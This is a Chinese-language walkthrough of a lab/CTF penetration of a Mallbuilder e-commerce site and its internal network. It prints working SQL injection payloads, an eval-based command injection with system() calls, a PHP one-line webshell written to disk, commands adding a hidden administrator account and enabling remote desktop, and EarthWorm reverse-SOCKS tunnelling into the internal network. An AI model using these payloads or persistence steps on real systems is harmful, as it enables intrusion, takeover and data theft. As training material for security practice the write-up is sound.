php网站渗透实战_【案例分析】记一次综合靶场实战渗透
原标题:【案例分析】记一次综合靶场实战渗透
时间有点久,这里主要和大家分享一下思路。
该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。
开始渗透
首先进入靶场开放的唯一一个开放的web端。
进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。
payload:
/cate_show_ajax.php?oper=ajax& call=get_cate POST catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectuserFROMmallbuilder_admin)a limit0, 1)) #
md5解密后得知admin 密码为:mall123!@#
可以通过sql注入获取第一个flag
payload:
/cate_show_ajax.php?oper=ajax& call=get_cate
post提交:
catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectflag FROMflag)a)) #
得到第一个flag
登录管理账号admin 密码为 mall123!@# ,进入后台
查看源代码,发现第二个flag
网上没有公开的后台 getshell 的漏洞,需要下载一份源码进行简单的审计
源码地址:https://github.com/source-trace/mallbuilder
在 adminmodule_translations.php 存在命令执行
include_once( "../includes/global.php");
$_tmp = explode( '/', $_SERVER[ '_NAME']);
$sctiptName = array_pop($_tmp);
include_once( "auth.php");
if( empty($_POST))
{
$refer_lang = $_GET[ 'code'] == 'en'? 'cn': 'en'; //基本参照语言
$l = $rl = array; echo"start";
@ include_once($config[ 'webroot']. '/module/'.$_GET[ 'mod']. '/lang/'.$_GET[ 'code']. '.php');
@ eval( '$l =$_LANG_MOD_'.strtoupper($_GET[ 'mod']). ';');
@ include_once($config[ 'webroot']. '/module/'.$_GET[ 'mod']. '/lang/'.$refer_lang. '.php');
@ eval( '$rl =$_LANG_MOD_'.strtoupper($_GET[ 'mod']). ';');
$diff_lang = @array_diff_key($rl,$l);
$l += $diff_lang;
if($l== '')
die($lang[ 'translat_data_emp']);
} else{
if($config[ 'enable_tranl']== 0)
{
die($lang[ 'tranl_fordid']);
}
include_once( "../includes/lang_class.php");
$tr_lang = newlang;
foreach($tr_lang->module_files as$key=>$mod)
{
if( isset($_POST[strtolower($mod)]))
{
$tr_lang->save_module_files( $_POST[strtolower($mod)],$key,$_GET[ 'code'] );
echo"<>parent.window.succ_trans_tip('$key');>";
break;
}
}
die;
}
?>
mod 参数被带入 eval 执行,但是中间经过了 strtoupper 函数,这个在后期写码的时候需要注意
/admin/module_translations.php?mod=; system( 'whoami')
/admin/module_translations.php?mod=; system( 'dir')
发现flag.php
直接 type 读取
payload:
/admin/module_translations.php?mod=; system( 'type flag.php')
得到第三个flag
由于有cookie不能直接连接,所以先写一个码出来,需要注意strtoupper函数
经过测试,发现上传一句话木马只能用数字命名,如下例的1.php
/admin/module_translations.php?mod=;file_put_contents('1.php',' <?php @ eval($_POST[ 1]); ?>')
使用菜刀连接(2333当时还是用的菜刀)
在C盘根目录下发现flag.txt,但是没有权限读取
打开Cknife的模拟终端,执行命令
net user simple 111Qqq... / add添加一个叫做 simple的用户
net localgroup administrators simple / add将 simple 添加到管理员组中
reg add"hklmsystemcurrentcontrolsetcontrolterminal server"/f /v fDenyTSConnections /t
REG_DWORD /d 0开启远程桌面
netstat -an 查看开放端口
发现3389端口开放成功,使用windows下自带的工具mstsc.exe进行远程桌面连接
使用创建的simple账户登录进入后找到在C盘根目录下的flag.txt 修改文件权限,即可读到第四个flag
在管理员桌面发现第五个flag
进入内网
除了一个开发web端可以直接访问,其他都是内网环境,需要做端口转发,这里用EarthWorm配合proxifier进行端口转发和全局代理设置。目的是可以通过本机访问内网环境。
EarthWorm官网包含使用教程:https://rootkiter.com/EarthWorm/
在端口转发之前首先在本地开启接收转发,使用Earthworm
命令: ew_for_Win.exe -s rcsocks -l 1080 -e 8888
显示start listen port here即可
使用菜刀将端口转发工具:Earthworm 上传到网站目录下,进入模拟终端,使用工具进行端口转发。
在模拟终端执行命令:ew_for_Win.exe -s rssocks -d 10.10.80.27 -e 8888
使用proxifier配置服务器代理,配置代理规则即可实现本机访问内网ip
后记
EarthWarm官网已停止更新并且停止下载,这里给大家分享:EarthWarm
另外内网穿透推荐使用nps,nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。
地址:https://github.com/ehang-io/nps
来源:遗忘城
基础教程
我就知道你“在看”
责任编辑:
php网站渗透实战_【案例分析】记一次综合靶场实战渗透相关推荐
- Python爬虫_案例分析(二)
Python爬虫_案例分析(二) 一.电影天堂案例 import scrapy from scrapy_movie.items import ScrapyMovieItem class MvSpide ...
- 物流信息管理系统MySQL设计_案例分析第六章:物流管理系统的数据库设计(六个基本步骤)案例分析...
物流管理信息系统的数据库设计 (案例分析) 系统名称:物流管理信息系统(数据库管理系统) 一.需求分析 需求分析是整个数据库设计过程的基础,要收集数据库所有用户的信息内容和处理要求,并加以规格化和分析 ...
- 个人学术网站之发展:案例分析、宏观分析与政策建议, 参考~
2000年,个人学术网站得到了空前的发展,记录.回顾个人学术思想网站的发展历程,并分析其之所以得到发展的原因.空间,并着眼于中文世界学术发展的价值,探讨将来进一步发展的局限以及空间,给出适当的政策建议 ...
- SS00023.algorithm——|ArithmeticMachine.v23|——|Machine:项目实战.v03|案例分析|
一.案例分析 ### --- 案例分析~~~ 我们可以大概判别哪些特征很可能和用户是否购买保险会有相关关系. ~~~ 也可以结合我们的业务经验,以及数据可视化,特征工程方法,先行探索一下, ~~~ 这 ...
- SQL优化实战经典案例分析
前言 大家好,我是黎杜,今天和大家聊聊SQL优化的场景. SQL调优这块呢,大厂面试必问的.最近金九银十嘛,所以整理了SQL的调优思路,并且附几个经典案例分析. 1.慢SQL优化思路. 慢查询日志记录 ...
- 移动app部分机型无法唤起h5支付宝支付_案例分析:H5支付交互体验设计
随着互联网技术和手机软硬件的高速发展,手机的使用场景已经融入到日常生活的点滴中.购物用淘宝下单,饿了在美团点外卖,出行滴滴一下--这些关联衣食住行的应用,都离不开一个核心环节:线上支付. 手机支付通常 ...
- 雷达波形样式_案例分析 | 基于XSIM的雷达电子对抗仿真
电子对抗在现代化战争中对战略攻防具有重要作用,能够削弱.破坏敌方电子设备的使用效能,保障己方电子设备发挥效能.因此在军事仿真领域,雷达电子对抗仿真显得尤为重要.本文主要介绍雷达与电子战设备间的攻防对抗 ...
- spss多元线性回归散点图_案例分析 | 多元线性回归及SPSS操作
一.案例 案例来源:中华护理杂志2018年3期 关于护士触摸舒适感的现状调查及其影响因素分析. 方法:2017年3月-5月,采用方便抽样的方法选取某市3所三级甲等医院的100名护士,采用护士一般资料调 ...
- mysql的彩蛋_深度分析 | 记一次 MySQL semaphore crash 的分析(有彩蛋)
原创作者:洪斌 DBA应该对InnoDB: Semaphore wait has lasted > 600 seconds. We intentionally crash the server ...
最新文章
- github创建项目,并提交本地文件
- SAP固定资产减值准备的处理方法
- Apache Thrift的使用
- 塞班自带浏览器下载路径问题
- C# 7.1先睹为快(第一部分)
- 生成n*n蛇形矩阵的算法
- python笔记小白入门_python小白入门基础(七:集合与字典)
- 云服务器上安装jboss_jboss下载_精通jboss下载_下载与安装jboss-华军软件园
- python之列表详解
- 读研究生时,还有【暑假】么?
- HTML+CSS期末大作业:动漫网站设计——悬崖上的金鱼姬(5页) / 动漫网页设计作业,网页设计作业 / 动漫网页设计成品 学生DW网页设计作业成品 web课程设计网页规划与设计...
- mysql 中 一个汉字吗_MySQL 中一个汉字占多少存储?
- 做出正确选择 重设精彩人生
- 和平精英封十年修改服务器,和平精英反开挂系统升级,观战作弊最低封号十年,网友:大快人心...
- 浅谈《网络数据安全标准体系建设指南》(征求意见稿)的意见(附全文)
- 业务数据激增,4张图看清zData如何助力金融企业快速响应IT需求
- 了解Windows 10中的新开始菜单
- 最新好玩的神乐七奈桌面宠物+附带BGM音效
- Word排版问题——页脚设置
- Redshift渲染器为什么这么受欢迎?